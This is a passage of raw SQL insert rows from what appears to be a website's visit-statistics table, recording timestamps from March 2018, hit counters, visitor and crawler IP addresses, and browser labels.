.171.55','other'),(219372,1520900604,1,1,0,0,'54.36.148.118','other'),(219373,1520901254,1,1,0,0,'54.36.149.3','other'),(219374,1520901296,1,1,0,0,'8.29.198.26','other'),(219375,1520901303,1,1,0,0,'54.36.148.36','other'),(219376,1520901346,1,1,0,0,'54.36.148.99','other'),(219377,1520901394,1,1,0,0,'37.9.113.101','other'),(219378,1520901478,1,1,0,0,'54.36.148.181','other'),(219379,1520901703,2,2,0,0,'54.36.148.179','other'),(219380,1520901824,2,2,0,0,'46.201.135.109','chrome'),(219381,1520901841,1,1,0,0,'54.36.148.46','other'),(219382,1520901986,1,1,0,0,'54.36.149.22','other'),(219384,1520902024,1,1,0,0,'54.36.148.131','other'),(219385,1520902031,1,1,0,0,'54.36.149.61','other'),(219386,1520902587,1,1,0,0,'54.36.149.28','other'),(219387,1520902608,1,1,0,0,'54.36.149.33','other'),(219388,1520903175,1,1,0,0,'54.36.149.63','other'),(219389,1520903484,1,1,0,0,'54.36.149.103','other'),(219390,1520903650,4,4,0,0,'141.8.142.74','other'),(219391,1520903811,1,1,0,0,'54.36.148.169','other'),(219392,1520903878,1,1,0,0,'54.36.148.118','other'),(219393,1520904108,1,1,0,0,'54.36.148.107','other'),(219394,1520904184,1,1,0,0,'34.234.204.97','other'),(219395,1520904306,1,1,0,0,'207.46.13.133','other'),(219396,1520904495,1,0,1,0,'66.249.66.201',''),(219397,1520904689,1,1,0,0,'54.36.148.44','other'),(219398,1520904769,1,1,0,0,'54.36.148.131','other'),(219399,1520904797,1,1,0,0,'54.36.149.25','other'),(219400,1520905088,1,1,0,0,'34.234.204.97','other'),(219401,1520905742,1,1,0,0,'54.36.148.132','other'),(219402,1520906060,1,1,0,0,'54.36.148.31','other'),(219403,1520906091,2,2,0,0,'34.234.204.97','other'),(219404,1520906237,1,1,0,0,'54.36.148.184','other'),(219405,1520906303,1,1,0,0,'54.36.148.216','other'),(219406,1520906372,1,1,0,0,'54.36.149.77','other'),(219407,1520906733,1,1,0,0,'178.154.171.88','other'),(219408,1520907019,1,1,0,0,'54.36.148.73','other'),(219409,1520907028,1,1,0,0,'34.234.204.97','other'),(219410,1520907590,1,1,0,0,'54.36.148.159','other'),(219411,1520907948,1,1,0,0,'34.234.204.97','other'),(219412,1520907979,1,1,0,0,'54.36.149.7','other'),(219413,1520908295,1,1,0,0,'54.36.148.238','other'),(219414,1520908503,1,1,0,0,'54.36.149.97','other'),(219415,1520908761,1,1,0,0,'54.36.148.210','other'),(219416,1520908843,1,1,0,0,'180.76.15.161','other'),(219417,1520908877,1,1,0,0,'34.234.204.97','other'),(219418,1520909146,1,1,0,0,'54.36.148.234','other'),(219419,1520909468,1,1,0,0,'95.132.27.215','firefox'),(219420,1520909712,1,1,0,0,'157.55.39.205','other'),(219421,1520909739,1,1,0,0,'54.36.149.34','other'),(219422,1520909876,1,1,0,0,'54.36.148.90','other'),(219423,1520910079,1,1,0,0,'54.36.148.19','other'),(219424,1520910146,1,1,0,0,'54.36.148.199','other'),(219425,1520910165,1,1,0,0,'216.244.66.194','other'),(219426,1520910194,1,1,0,0,'54.36.148.70','other'),(219427,1520910294,1,1,0,0,'54.36.148.100','other'),(219428,1520910336,1,1,0,0,'217.69.133.68','other'),(219429,1520910755,1,1,0,0,'54.36.148.220','other'),(219430,1520911060,1,1,0,0,'54.36.148.39','other'),(219431,1520911067,1,1,0,0,'54.36.148.249','other'),(219432,1520911549,1,1,0,0,'87.250.224.46','other'),(219433,1520911562,1,1,0,0,'54.36.148.160','other'),(219434,1520911753,1,1,0,0,'54.36.148.121','other'),(219435,1520912098,1,1,0,0,'54.36.148.248','other'),(219436,1520912135,1,1,0,0,'8.29.198.27','other'),(219437,1520912242,1,1,0,0,'54.36.148.254','other'),(219438,1520912660,1,1,0,0,'54.36.149.30','other'),(219439,1520912724,4,4,0,0,'87.250.224.46','other'),(219440,1520912746,4,4,0,0,'178.154.171.88','other'),(219441,1520912751,1,1,0,0,'141.8.132.19','other'),(219442,1520912754,2,2,0,0,'141.8.142.74','other'),(219443,1520912760,1,1,0,0,'37.9.113.182','other'),(219444,1520912875,1,1,0,0,'54.36.148.238','other'),(219445,1520913608,1,1,0,0,'54.36.148.159','other'),(219446,1520913786,1,1,0,0,'178.154.171.60','other'),(219447,1520914022,1,1,0,0,'178.154.171.88','other'),(219448,1520914285,2,2,0,0,'141.8.142.74','other'),(219449,1520914466,1,1,0,0,'54.36.148.59','other'),(219450,1520914959,1,1,0,0,'54.36.148.84','other'),(219451,1520915312,2,2,0,0,'84.202.218.13','other'),(219452,1520915549,1,1,0,0,'54.36.149.14','other'),(219453,1520915758,1,1,0,0,'216.244.66.237','other'),(219454,1520916347,1,1,0,0,'54.36.149.93','other'),(219455,1520916421,1,1,0,0,'54.36.148.195','other'),(219456,1520916844,1,1,0,0,'54.36.148.101','other'),(219457,1520916892,2,2,0,0,'54.36.148.223','other'),(219458,1520917498,1,1,0,0,'188.230.43.254','other'),(219459,1520917849,1,1,0,0,'178.154.171.88','other'),(219460,1520918167,1,1,0,0,'54.36.148.186','other'),(219461,1520918333,1,1,0,0,'46.161.9.39','firefox'),(219462,1520918360,1,1,0,0,'157.55.39.207','other'),(219463,1520918538,1,1,0,0,'141.8.142.74','other'),(219464,1520918616,2,2,0,0,'216.244.66.237','other'),(219465,1520919896,1,1,0,0,'54.36.148.215','other'),(219466,1520919964,1,1,0,0,'54.36.148.85','other'),(219467,1520920289,1,1,0,0,'54.36.148.250','other'),(219468,1520920799,1,1,0,0,'54.36.148.127','other'),(219469,1520921229,1,1,0,0,'54.36.148.157','other'),(219470,1520921473,1,1,0,0,'178.154.171.88','other'),(219471,1520921484,1,1,0,0,'54.36.148.20','other'),(219472,1520921586,1,0,1,0,'66.249.66.199',''),(219473,1520921701,2,2,0,0,'77.111.244.42','chrome'),(219474,1520921753,1,1,0,0,'54.36.148.160','other'),(219475,1520922013,1,1,0,0,'54.36.148.17','other'),(219476,1520922217,2,2,0,0,'130.180.216.59','chrome'),(219477,1520922403,1,1,0,0,'54.36.148.233','other'),(219478,1520922785,2,2,0,0,'91.196.177.46','chrome'),(219479,1520922788,1,1,0,0,'54.36.149.80','other'),(219480,1520922796,1,1,0,0,'54.36.149.24','other'),(219481,1520922992,1,1,0,0,'8.29.198.25','other'),(219482,1520923123,1,1,0,0,'46.219.33.167','chrome'),(219483,1520923129,1,1,0,0,'54.36.148.114','other'),(219484,1520923148,1,1,0,0,'91.229.121.2','chrome'),(219485,1520923553,1,1,0,0,'54.36.149.53','other'),(219486,1520923837,1,1,0,0,'54.36.149.80','other'),(219487,1520923915,1,1,0,0,'54.36.148.105','other'),(219488,1520924002,1,1,0,0,'54.36.148.217','other'),(219489,1520924732,3,3,0,0,'141.8.142.74','other'),(219490,1520924736,1,1,0,0,'54.36.149.22','other'),(219491,1520924766,1,1,0,0,'157.55.39.204','other'),(219492,1520925130,1,1,0,0,'157.55.39.205','other'),(219493,1520925174,2,2,0,0,'178.154.171.88','other'),(219494,1520925207,1,1,0,0,'54.36.148.185','other'),(219495,1520925563,1,1,0,0,'54.36.149.34','other'),(219496,1520925834,1,1,0,0,'91.209.11.236','other'),(219497,1520926073,1,1,0,0,'141.8.142.74','other'),(219498,1520926726,1,1,0,0,'54.36.148.230','other'),(219499,1520927183,1,1,0,0,'157.55.39.207','other'),(219500,1520927434,1,1,0,0,'54.36.148.116','other'),(219501,1520927499,1,1,0,0,'54.36.148.115','other'),(219502,1520927674,1,1,0,0,'54.36.149.0','other'),(219503,1520927899,1,1,0,0,'141.8.142.74','other'),(219504,1520928033,2,2,0,0,'91.196.178.93','chrome'),(219505,1520928037,1,1,0,0,'54.36.148.22','other'),(219506,1520928117,2,2,0,0,'130.180.216.59','chrome'),(219507,1520928889,1,1,0,0,'193.194.127.253','chrome'),(219508,1520929218,1,1,0,0,'82.196.1.179','chrome'),(219509,1520929861,1,1,0,0,'178.154.171.88','other'),(219510,1520929946,1,1,0,0,'54.36.148.246','other'),(219511,1520930132,1,1,0,0,'54.36.148.142','other'),(219512,1520930275,1,1,0,0,'141.8.142.74','other'),(219513,1520930380,1,1,0,0,'54.36.148.240','other'),(219514,1520930632,2,2,0,0,'91.196.178.93','chrome'),(219515,1520931052,2,2,0,0,'195.230.119.34','chrome'),(219516,1520931294,2,2,0,0,'141.8.142.74','other'),(219517,1520931313,1,1,0,0,'54.36.149.94','other'),(219518,1520931367,1,1,0,0,'54.36.148.122','other'),(219519,1520931449,2,2,0,0,'82.196.1.179','chrome'),(219520,1520931900,1,1,0,0,'54.36.148.166','other'),(219521,1520931982,1,1,0,0,'54.36.148.254','other'),(219522,1520932405,3,3,0,0,'91.196.178.46','chrome'),(219523,1520932468,2,2,0,0,'91.196.178.93','chrome'),(219524,1520932745,1,1,0,0,'54.36.148.208','other'),(219525,1520932810,1,1,0,0,'159.224.54.15','chrome'),(219526,1520932878,1,1,0,0,'212.87.168.59','firefox'),(219527,1520932993,1,1,0,0,'54.36.149.100','other'),(219528,1520933051,1,1,0,0,'54.36.148.252','other'),(219529,1520933123,1,1,0,0,'180.76.15.162','other'),(219530,1520933171,1,1,0,0,'54.36.148.151','other'),(219531,1520933183,1,1,0,0,'92.112.125.243','chrome'),(219532,1520933320,1,1,0,0,'54.36.148.133','other'),(219533,1520933329,2,2,0,0,'211.149.240.143','firefox'),(219534,1520933401,1,1,0,0,'54.36.148.225','other'),(219535,1520933404,1,1,0,0,'54.36.149.12','other'),(219536,1520933835,1,1,0,0,'37.52.22.107','firefox'),(219537,1520933848,1,1,0,0,'8.29.198.27','other'),(219538,1520933855,1,1,0,0,'54.36.149.94','other'),(219539,1520933980,1,1,0,0,'54.36.149.59','other'),(219540,1520933991,1,0,1,0,'66.249.66.201',''),(219541,1520934049,1,1,0,0,'178.154.171.88','other'),(219542,1520934084,1,1,0,0,'46.211.127.86','chrome'),(219543,1520934223,1,1,0,0,'54.36.148.214','other'),(219544,1520934401,1,1,0,0,'87.250.224.46','other'),(219545,1520934402,1,1,0,0,'54.36.148.43','other'),(219546,1520934430,1,1,0,0,'91.196.178.135','firefox'),(219547,1520934619,1,1,0,0,'54.36.148.232','other'),(219548,1520934890,1,1,0,0,'54.36.148.72','other'),(219549,1520934913,1,1,0,0,'54.36.149.29','other'),(219550,1520935045,1,1,0,0,'54.36.149.24','other'),(219551,1520935214,1,1,0,0,'54.36.149.18','other'),(219552,1520935378,2,2,0,0,'91.196.178.93','chrome'),(219553,1520935474,2,2,0,0,'130.180.216.59','chrome'),(219554,1520935499,1,1,0,0,'54.36.149.82','other'),(219555,1520936579,3,3,0,0,'91.196.178.46','chrome'),(219556,1520936758,1,1,0,0,'54.36.148.132','other'),(219557,1520937003,1,1,0,0,'54.36.148.208','other'),(219558,1520937082,1,1,0,0,'141.8.142.74','other'),(219559,1520937125,1,1,0,0,'91.196.178.136','firefox'),(219560,1520937127,1,1,0,0,'54.36.148.72','other'),(219561,1520937330,3,3,0,0,'91.196.178.93','chrome'),(219562,1520937529,1,1,0,0,'54.36.148.46','other'),(219563,1520937796,1,1,0,0,'54.36.148.93','other'),(219564,1520937858,1,1,0,0,'54.36.148.223','other'),(219565,1520937869,1,1,0,0,'54.36.148.157','other'),(219566,1520937905,1,1,0,0,'54.36.148.177','other'),(219567,1520938093,1,1,0,0,'54.36.148.91','other'),(219568,1520938258,2,2,0,0,'91.196.177.46','chrome'),(219569,1520938999,1,1,0,0,'40.77.167.182','other'),(219570,1520939118,2,2,0,0,'91.196.178.163','chrome'),(219571,1520939177,1,1,0,0,'54.36.148.94','other'),(219572,1520939472,1,1,0,0,'54.36.148.120','other'),(219573,1520939661,1,1,0,0,'54.36.148.130','other'),(219574,1520939850,1,1,0,0,'217.69.133.237','other'),(219575,1520940237,1,1,0,0,'216.244.66.237','other'),(219576,1520940331,2,2,0,0,'130.180.216.59','chrome'),(219577,1520940480,1,1,0,0,'54.36.148.228','other'),(219578,1520940611,1,1,0,0,'54.36.148.13','other'),(219579,1520940619,1,1,0,0,'95.134.97.244','chrome'),(219580,1520941061,1,1,0,0,'37.53.234.112','chrome'),(219581,1520941116,1,1,0,0,'93.180.179.71','chrome'),(219582,1520941608,1,1,0,0,'54.36.148.238','other'),(219583,1520941646,4,4,0,0,'141.8.142.74','other'),(219584,1520941968,1,1,0,0,'95.134.97.244','chrome'),(219585,1520942124,1,1,0,0,'54.36.148.96','other'),(219586,1520942521,2,2,0,0,'94.179.147.128','chrome'),(219587,1520943125,3,3,0,0,'87.250.224.46','other'),(219588,1520943519,1,1,0,0,'54.36.148.184','other'),(219589,1520943701,1,1,0,0,'95.158.3.62','chrome'),(219590,1520943795,1,1,0,0,'54.36.148.33','other'),(219591,1520943853,1,1,0,0,'54.36.148.110','other'),(219592,1520943888,1,1,0,0,'54.36.148.213','other'),(219593,1520943914,1,1,0,0,'91.196.178.164','firefox'),(219594,1520944334,3,3,0,0,'130.180.216.59','chrome'),(219595,1520944563,1,1,0,0,'178.251.107.33','chrome'),(219596,1520944615,1,1,0,0,'54.36.149.20','other'),(219597,1520944622,2,2,0,0,'91.196.178.93','chrome'),(219598,1520944643,1,1,0,0,'54.36.148.20','other'),(219599,1520944717,1,1,0,0,'8.29.198.26','other'),(219600,1520944854,1,1,0,0,'54.36.148.242','other'),(219601,1520944940,1,1,0,0,'54.36.148.215','other'),(219602,1520945536,1,1,0,0,'176.31.255.65','other'),(219603,1520945713,1,1,0,0,'54.36.148.64','other'),(219604,1520946303,2,2,0,0,'91.196.179.134','chrome'),(219605,1520946656,1,1,0,0,'54.36.148.67','other'),(219606,1520946715,1,1,0,0,'207.46.13.6','other'),(219607,1520946719,2,2,0,0,'91.196.178.164','chrome'),(219608,1520946969,4,4,0,0,'91.196.178.93','chrome'),(219609,1520947118,1,1,0,0,'54.36.148.135','other'),(219610,1520947382,2,2,0,0,'77.111.244.65','chrome'),(219611,1520947421,2,2,0,0,'91.196.177.46','chrome'),(219612,1520947464,1,1,0,0,'91.196.178.90','chrome'),(219613,1520947509,3,3,0,0,'178.154.171.88','other'),(219614,1520947512,1,1,0,0,'87.250.224.46','other'),(219615,1520947519,6,6,0,0,'141.8.142.74','other'),(219616,1520947807,1,1,0,0,'54.36.148.44','other'),(219617,1520948200,1,1,0,0,'54.36.149.82','other'),(219618,1520948457,1,1,0,0,'54.36.148.155','other'),(219619,1520948499,2,2,0,0,'91.196.178.164','chrome'),(219620,1520948597,1,1,0,0,'91.196.178.164','firefox'),(219621,1520948600,1,1,0,0,'54.36.149.104','other'),(219622,1520949151,1,1,0,0,'54.36.148.37','other'),(219623,1520949199,2,2,0,0,'216.244.66.246','other'),(219624,1520949517,1,1,0,0,'91.196.178.164','chrome'),(219625,1520949704,1,1,0,0,'54.36.149.9','other'),(219626,1520949791,2,2,0,0,'91.196.178.164','other'),(219627,1520949792,1,1,0,0,'91.196.178.164','msie'),(219628,1520949808,1,1,0,0,'54.36.148.84','other'),(219629,1520949893,1,1,0,0,'54.36.149.48','other'),(219630,1520949942,1,1,0,0,'54.36.149.93','other'),(219631,1520950274,1,1,0,0,'213.180.203.8','other'),(219632,1520950351,1,1,0,0,'54.36.149.13','other'),(219633,1520950518,1,1,0,0,'91.196.178.55','chrome'),(219634,1520950578,1,1,0,0,'216.244.66.237','other'),(219635,1520950598,1,1,0,0,'91.196.178.164','chrome'),(219636,1520951155,1,1,0,0,'54.36.148.215','other'),(219637,1520951181,1,1,0,0,'54.36.148.216','other'),(219638,1520951535,2,2,0,0,'88.99.19.242','other'),(219639,1520951539,1,1,0,0,'54.36.149.23','other'),(219640,1520951656,1,1,0,0,'54.36.148.247','other'),(219641,1520951696,1,1,0,0,'37.9.113.182','other'),(219642,1520951869,1,1,0,0,'87.250.224.46','other'),(219643,1520952094,1,1,0,0,'91.196.178.164','chrome'),(219644,1520952168,1,1,0,0,'188.166.77.213','chrome'),(219645,1520952334,1,1,0,0,'178.154.171.88','other'),(219646,1520953316,1,1,0,0,'54.36.149.92','other'),(219647,1520953331,2,2,0,0,'141.8.132.19','other'),(219648,1520953336,1,1,0,0,'178.154.171.88','other'),(219649,1520953338,1,1,0,0,'141.8.142.74','other'),(219650,1520953342,1,1,0,0,'54.36.148.208','other'),(219651,1520953392,1,1,0,0,'54.36.148.71','other'),(219652,1520953570,1,1,0,0,'54.36.148.91','other'),(219653,1520953678,1,1,0,0,'188.230.43.254','other'),(219654,1520953753,1,1,0,0,'92.112.125.243','chrome'),(219655,1520953883,1,1,0,0,'54.36.149.59','other'),(219656,1520954108,1,1,0,0,'54.36.148.114','other'),(219657,1520954322,1,1,0,0,'95.134.97.244','firefox'),(219658,1520954453,1,1,0,0,'54.36.148.66','other'),(219659,1520954538,1,1,0,0,'91.196.178.43','chrome'),(219660,1520954793,1,1,0,0,'54.36.149.41','other'),(219661,1520955117,1,1,0,0,'185.155.90.1','firefox'),(219662,1520955227,1,1,0,0,'54.36.148.200','other'),(219663,1520955257,1,1,0,0,'188.230.43.254','other'),(219664,1520955572,1,1,0,0,'54.36.148.250','other'),(219665,1520955589,1,1,0,0,'8.29.198.26','other'),(219666,1520955638,1,1,0,0,'54.36.148.216','other'),(219667,1520955670,3,3,0,0,'178.154.171.88','other'),(219668,1520955685,1,1,0,0,'54.36.148.28','other'),(219669,1520955687,7,7,0,0,'141.8.142.74','other'),(219670,1520955690,1,1,0,0,'87.250.224.46','other'),(219671,1520955851,1,1,0,0,'54.36.148.114','other'),(219672,1520955934,1,1,0,0,'54.36.148.126','other'),(219673,1520956122,1,1,0,0,'54.36.148.195','other'),(219674,1520956452,2,2,0,0,'54.198.11.210','other'),(219675,1520956479,1,1,0,0,'54.36.149.10','other'),(219676,1520956632,2,2,0,0,'141.8.142.74','other'),(219677,1520956868,1,1,0,0,'54.36.148.85','other'),(219678,1520956898,1,1,0,0,'188.230.43.254','other'),(219679,1520957106,1,1,0,0,'54.36.148.141','other'),(219680,1520957150,1,1,0,0,'54.36.149.80','other'),(219681,1520957372,1,0,1,0,'66.249.66.199',''),(219682,1520957697,1,1,0,0,'54.36.149.41','other'),(219683,1520958050,2,2,0,0,'178.154.171.88','other'),(219684,1520958253,1,1,0,0,'54.36.149.104','other'),(219685,1520958336,1,1,0,0,'54.36.148.177','other'),(219686,1520958991,1,1,0,0,'54.36.148.66','other'),(219687,1520959005,2,2,0,0,'54.198.11.210','other'),(219688,1520959075,1,1,0,0,'188.230.43.254','other'),(219689,1520959094,1,1,0,0,'54.36.148.69','other'),(219690,1520959109,1,1,0,0,'54.36.148.108','other'),(219691,1520959306,1,0,1,0,'66.249.66.195',''),(219692,1520959362,1,1,0,0,'54.36.148.164','other'),(219693,1520959932,1,1,0,0,'54.36.148.198','other'),(219694,1520959934,1,1,0,0,'91.196.178.163','chrome'),(219695,1520960044,1,1,0,0,'195.230.130.105','chrome'),(219696,1520960305,1,1,0,0,'54.36.148.50','other'),(219697,1520960428,1,1,0,0,'54.36.148.242','other'),(219698,1520960553,1,1,0,0,'54.198.11.210','other'),(219699,1520960586,1,1,0,0,'54.36.148.247','other'),(219700,1520960755,1,0,1,0,'66.249.66.199',''),(219701,1520960771,1,0,1,0,'66.249.66.157',''),(219702,1520960802,1,1,0,0,'80.252.154.233','chrome'),(219703,1520960847,1,0,1,0,'66.249.66.195',''),(219704,1520961221,1,1,0,0,'54.36.149.76','other'),(219705,1520961226,1,1,0,0,'54.36.148.239','other'),(219706,1520961250,1,1,0,0,'54.36.149.4','other'),(219707,1520961253,1,1,0,0,'92.113.44.153','chrome'),(219708,1520961285,1,1,0,0,'91.196.178.36','chrome'),(219709,1520961388,1,1,0,0,'141.8.142.74','other'),(219710,1520961474,1,1,0,0,'188.230.43.254','other'),(219711,1520961475,1,1,0,0,'54.36.148.52','other'),(219712,1520961749,2,2,0,0,'54.198.11.210','other'),(219713,1520962153,1,1,0,0,'95.134.185.233','chrome'),(219714,1520962767,1,1,0,0,'54.36.148.115','other'),(219715,1520962776,1,1,0,0,'54.36.148.107','other'),(219716,1520962842,1,1,0,0,'54.36.148.237','other'),(219717,1520962872,1,1,0,0,'54.36.149.62','other'),(219718,1520963052,1,1,0,0,'54.36.148.23','other'),(219719,1520963566,1,1,0,0,'54.36.148.154','other'),(219720,1520963740,1,1,0,0,'54.36.148.164','other'),(219721,1520963792,1,1,0,0,'91.196.178.89','firefox'),(219722,1520963807,1,1,0,0,'54.36.148.47','other'),(219723,1520963811,1,0,1,0,'66.249.66.201',''),(219724,1520963873,1,1,0,0,'188.230.43.254','other'),(219725,1520963977,1,1,0,0,'54.36.148.245','other'),(219726,1520964016,1,1,0,0,'54.36.148.212','other'),(219727,1520964155,1,1,0,0,'54.198.11.210','other'),(219728,1520964297,1,1,0,0,'54.36.148.219','other'),(219729,1520964357,1,1,0,0,'141.8.142.74','other'),(219730,1520964603,2,2,0,0,'178.154.171.88','other'),(219731,1520964685,1,1,0,0,'54.36.148.54','other'),(219732,1520965001,1,1,0,0,'54.36.149.98','other'),(219733,1520965452,1,1,0,0,'195.77.80.87','chrome'),(219734,1520965707,1,1,0,0,'54.36.148.186','other'),(219735,1520966273,1,1,0,0,'188.230.43.254','other'),(219736,1520966444,1,1,0,0,'8.29.198.26','other'),(219737,1520966749,3,3,0,0,'31.43.45.136','chrome'),(219738,1520967066,1,1,0,0,'54.36.148.16','other'),(219739,1520967239,1,1,0,0,'54.36.149.15','other'),(219740,1520967253,1,1,0,0,'188.230.43.254','other'),(219741,1520967399,4,4,0,0,'54.198.11.210','other'),(219742,1520967513,1,1,0,0,'54.36.149.27','other'),(219743,1520967800,1,1,0,0,'141.8.142.74','other'),(219744,1520967823,1,1,0,0,'66.249.66.156','chrome'),(219745,1520968003,3,3,0,0,'54.165.59.7','other'),(219746,1520968144,1,1,0,0,'54.36.148.190','other'),(219747,1520968272,1,1,0,0,'54.36.149.31','other'),(219748,1520968284,1,1,0,0,'54.36.148.172','other'),(219749,1520968608,1,1,0,0,'54.36.148.184','other'),(219750,1520968766,1,1,0,0,'193.194.127.222','firefox'),(219751,1520968820,1,1,0,0,'34.234.204.97','other'),(219752,1520968911,2,2,0,0,'54.198.11.210','other'),(219753,1520968937,1,1,0,0,'54.36.148.225','other'),(219754,1520969035,2,2,0,0,'54.165.59.7','other'),(219755,1520969142,1,1,0,0,'141.8.142.74','other'),(219756,1520969366,1,1,0,0,'217.69.133.10','other'),(219757,1520969807,1,1,0,0,'54.36.148.131','other'),(219758,1520969916,1,1,0,0,'216.244.66.194','other'),(219759,1520969940,1,1,0,0,'34.234.204.97','other'),(219760,1520970540,3,3,0,0,'173.208.206.50','other'),(219761,1520970709,1,1,0,0,'54.198.11.210','other'),(219762,1520970722,1,1,0,0,'66.249.66.199','chrome'),(219763,1520970888,1,1,0,0,'34.234.204.97','other'),(219764,1520970989,1,1,0,0,'54.36.148.233','other'),(219765,1520971532,1,1,0,0,'54.36.148.112','other'),(219766,1520971681,1,1,0,0,'54.36.148.99','other'),(219767,1520972078,1,1,0,0,'54.36.148.11','other'),(219768,1520972175,1,1,0,0,'178.154.171.88','other'),(219769,1520972176,1,1,0,0,'54.36.148.188','other'),(219770,1520972196,1,1,0,0,'54.36.148.234','other'),(219771,1520972319,4,4,0,0,'54.198.11.210','other'),(219772,1520972340,1,1,0,0,'54.36.149.48','other'),(219773,1520972747,1,1,0,0,'54.36.148.220','other'),(219774,1520972882,1,1,0,0,'45.79.89.129','chrome'),(219775,1520972979,1,1,0,0,'54.36.149.68','other'),(219776,1520973008,1,1,0,0,'54.36.148.27','other'),(219777,1520973019,1,1,0,0,'54.36.148.111','other'),(219778,1520973224,1,1,0,0,'54.36.148.99','other'),(219779,1520973279,1,1,0,0,'54.198.11.210','other'),(219780,1520974188,1,1,0,0,'54.36.149.5','other'),(219781,1520974204,1,1,0,0,'54.36.148.157','other'),(219782,1520974340,1,1,0,0,'216.244.66.237','other'),(219783,1520974348,1,1,0,0,'87.250.224.125','other'),(219784,1520974496,3,3,0,0,'54.198.11.210','other'),(219785,1520974504,1,1,0,0,'54.36.148.51','other'),(219786,1520974823,1,1,0,0,'54.36.148.49','other'),(219787,1520974881,1,1,0,0,'54.36.149.89','other'),(219788,1520975068,2,2,0,0,'130.180.210.245','chrome'),(219789,1520975072,1,1,0,0,'54.36.148.248','other'),(219790,1520975086,1,1,0,0,'45.79.89.129','msie'),(219791,1520975093,1,1,0,0,'54.36.148.113','other'),(219792,1520975121,1,1,0,0,'54.236.47.92','other'),(219793,1520975139,1,1,0,0,'54.36.148.26','other'),(219794,1520975444,1,0,1,0,'66.249.66.195',''),(219795,1520975579,1,1,0,0,'188.32.190.177','msie'),(219796,1520975863,1,1,0,0,'54.198.11.210','other'),(219797,1520975947,1,1,0,0,'54.36.149.27','other'),(219798,1520975966,2,2,0,0,'5.39.34.40','firefox'),(219799,1520976045,1,1,0,0,'54.36.148.23','other'),(219800,1520976194,1,1,0,0,'5.45.207.82','other'),(219801,1520976445,1,0,1,0,'66.249.66.199',''),(219802,1520976510,1,1,0,0,'54.36.148.137','other'),(219803,1520976527,1,1,0,0,'54.36.148.186','other'),(219804,1520976540,1,1,0,0,'37.9.113.114','other'),(219805,1520976608,1,1,0,0,'141.8.142.74','other'),(219806,1520976702,1,1,0,0,'54.36.149.24','other'),(219807,1520976807,1,1,0,0,'217.69.134.175','other'),(219808,1520977064,1,1,0,0,'54.198.11.210','other'),(219809,1520977146,1,1,0,0,'54.36.148.54','other'),(219810,1520977295,1,1,0,0,'8.29.198.26','other'),(219811,1520977448,1,1,0,0,'37.9.113.115','other'),(219812,1520977452,1,1,0,0,'37.9.113.101','other'),(219813,1520977454,1,1,0,0,'54.36.149.56','other'),(219814,1520977455,1,1,0,0,'178.154.171.4','other'),(219815,1520977550,1,1,0,0,'54.236.47.92','other'),(219816,1520977987,1,1,0,0,'54.36.149.23','other'),(219817,1520978212,1,1,0,0,'54.36.148.19','other'),(219818,1520978565,1,1,0,0,'54.36.148.171','other'),(219819,1520978589,1,1,0,0,'54.236.47.92','other'),(219820,1520978795,1,1,0,0,'45.79.89.129','firefox'),(219821,1520978929,1,1,0,0,'54.36.148.165','other'),(219822,1520979047,1,1,0,0,'54.36.148.49','other'),(219823,1520979196,1,1,0,0,'217.69.134.177','other'),(219824,1520979414,3,3,0,0,'54.198.11.210','other'),(219825,1520979647,1,1,0,0,'54.236.47.92','other'),(219826,1520979676,1,1,0,0,'46.161.9.39','firefox'),(219827,1520979801,1,1,0,0,'54.36.148.42','other'),(219828,1520980079,1,0,1,0,'66.249.66.157',''),(219829,1520980203,1,1,0,0,'54.36.148.57','other'),(219830,1520980257,1,0,1,0,'66.249.66.199',''),(219831,1520980385,1,1,0,0,'217.69.133.194','other'),(219832,1520980419,1,1,0,0,'87.250.224.46','other'),(219833,1520980529,1,1,0,0,'54.36.149.4','other'),(219834,1520980979,1,1,0,0,'54.236.47.92','other'),(219835,1520981027,1,1,0,0,'54.198.11.210','other'),(219836,1520981154,1,1,0,0,'66.249.66.156','chrome'),(219837,1520981165,1,1,0,0,'54.36.148.35','other'),(219838,1520981178,1,1,0,0,'141.8.142.74','other'),(219839,1520981301,1,1,0,0,'217.69.134.188','other'),(219840,1520981463,1,1,0,0,'54.36.148.182','other'),(219841,1520981515,1,1,0,0,'54.36.149.75','other'),(219842,1520981554,1,1,0,0,'54.36.148.195','other'),(219843,1520981616,1,1,0,0,'54.36.148.64','other'),(219844,1520981713,1,1,0,0,'217.69.134.160','other'),(219845,1520981899,1,1,0,0,'54.36.148.141','other'),(219846,1520981933,1,1,0,0,'54.236.47.92','other'),(219847,1520982582,1,1,0,0,'54.36.148.166','other'),(219848,1520982995,1,1,0,0,'54.36.148.219','other'),(219849,1520983366,1,1,0,0,'54.236.47.92','other'),(219850,1520983444,1,0,1,0,'66.249.66.156',''),(219851,1520983540,1,1,0,0,'54.36.148.253','other'),(219852,1520984193,1,1,0,0,'54.36.149.32','other'),(219853,1520984273,1,1,0,0,'54.236.47.92','other'),(219854,1520984766,1,1,0,0,'216.244.66.246','other'),(219855,1520984992,1,1,0,0,'54.36.148.184','other'),(219856,1520985099,1,1,0,0,'54.36.149.25','other'),(219857,1520985284,1,1,0,0,'54.236.47.92','other'),(219858,1520985393,1,1,0,0,'54.36.149.41','other'),(219859,1520985440,6,6,0,0,'141.8.142.74','other'),(219860,1520985444,1,1,0,0,'87.250.224.46','other'),(219861,1520985447,3,3,0,0,'178.154.171.88','other'),(219862,1520985912,1,1,0,0,'54.36.148.48','other'),(219863,1520986019,1,1,0,0,'54.36.149.10','other'),(219864,1520986255,1,1,0,0,'54.36.148.188','other'),(219865,1520986352,1,1,0,0,'54.36.149.44','other'),(219866,1520986354,1,1,0,0,'54.36.149.85','other'),(219867,1520986515,1,0,1,0,'66.249.66.201',''),(219868,1520986517,1,1,0,0,'54.36.148.111','other'),(219869,1520986545,1,1,0,0,'54.236.47.92','other'),(219870,1520986557,1,1,0,0,'54.36.149.57','other'),(219871,1520986730,1,1,0,0,'54.165.59.7','other'),(219872,1520986848,1,1,0,0,'54.36.148.155','other'),(219873,1520986877,1,1,0,0,'54.36.149.33','other'),(219874,1520987165,1,0,1,0,'66.249.66.195',''),(219875,1520987182,1,1,0,0,'54.36.148.14','other'),(219876,1520987755,1,1,0,0,'54.236.47.92','other'),(219877,1520987843,1,0,1,0,'66.249.66.199',''),(219878,1520988146,1,1,0,0,'8.29.198.27','other'),(219879,1520988457,1,1,0,0,'34.229.137.99','other'),(219880,1520988659,1,1,0,0,'54.236.47.92','other'),(219881,1520988844,1,1,0,0,'54.36.148.229','other'),(219882,1520989098,1,1,0,0,'54.36.148.19','other'),(219883,1520989214,1,1,0,0,'54.36.149.70','other'),(219884,1520989305,1,1,0,0,'54.36.148.234','other'),(219885,